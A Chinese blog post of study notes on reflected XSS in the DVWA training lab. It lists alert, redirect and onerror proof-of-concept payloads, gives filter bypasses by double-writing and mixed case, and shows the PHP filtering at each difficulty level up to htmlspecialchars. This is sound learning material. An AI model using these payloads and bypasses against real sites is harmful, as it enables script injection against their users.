xss学习笔记——反射型

发表于： 2020年02月05日分类于：渗透测试

字数： 927 阅读：≈ 2分钟浏览： 4 评论： 0

温馨提醒

🚀 注意啦！这篇文章来自5 年 171 天以前，可能已跟不上时代的步伐。阅读时请自备时光机，小心穿越哦！

总结摘要

如何发现，并验证xss跨站脚本漏洞的存在

环境

靶机：dvwa
测试工具：BurpSuit，HackBar, Netcat

XSS 漏洞产生的原因，和 SQL 注入有“异曲同工之妙”，所以 XSS 又称作“ HTML 注入”，都是没有对用户输入的内容，进行检查过滤而导致站点被恶意利用，或者服务器数据被窃取，那么如何发现 XSS 漏洞的存在呢

一、验证思路

① 输入的内容提交后，查找当前页面中，有无显示输入的内容
② 输入漏洞验证代码，看是否有效

二、漏洞验证Poc

利用 HTML 语言中的几个常见的标签，以及 javascript，可以实现验证漏洞是否存在
例子中跳转的网页，我用的自己的路由器后台管理地址。

1
2
3
4
5
6
1 <script>alert('xss')</script>
2 <script>window.location="http://192.168.31.1"</script>
3 <script>window.open('http://192.168.31.1')</script>
3 <a href="http://192.168.31.1">click here</a>
4 <a href="" onclick=alert('xss')>click here</a>
5 <img src="http://192.168.31.1/a.img" onerror=alert('xss')>

当然，不是什么时候都会有效果

随着靶场等级的提高，对用户的输入内容就会愈加严格检查和过滤

思路要骚，才能绕过限制:D

① 靶场等级：low

没有任何过滤，输入的所有poc均生效

1
2
3
4
5
6

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

② 靶场等级：medl

匹配字符串非法字符，并替换为空字符串

1
2
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] ); 

Ⅰ. 双写绕过

1
   <sc<script>ript>alert('xss')</script>

Ⅱ. 大、小写混写绕过

1
   <ScrIPT>alert('xss')</script>

Ⅲ. 其他标签、事件绕过

③ 靶场等级：high

1
2
// Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); 

加强了过滤规则，采用正则替换

上一个方法中的双写、大小写都失效了

还好没有过滤其他的标签，和上一个一样，可以用其他标签触发XSS

④ 靶场等级：impossible

加入了 user_token 验证，和 htmlspecialchars() 函数对输入的字符串进行 “无害化处理”

这个例子中，各种姿势也没用了T_T

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
// Generate Anti-CSRF token
generateSessionToken();
?> 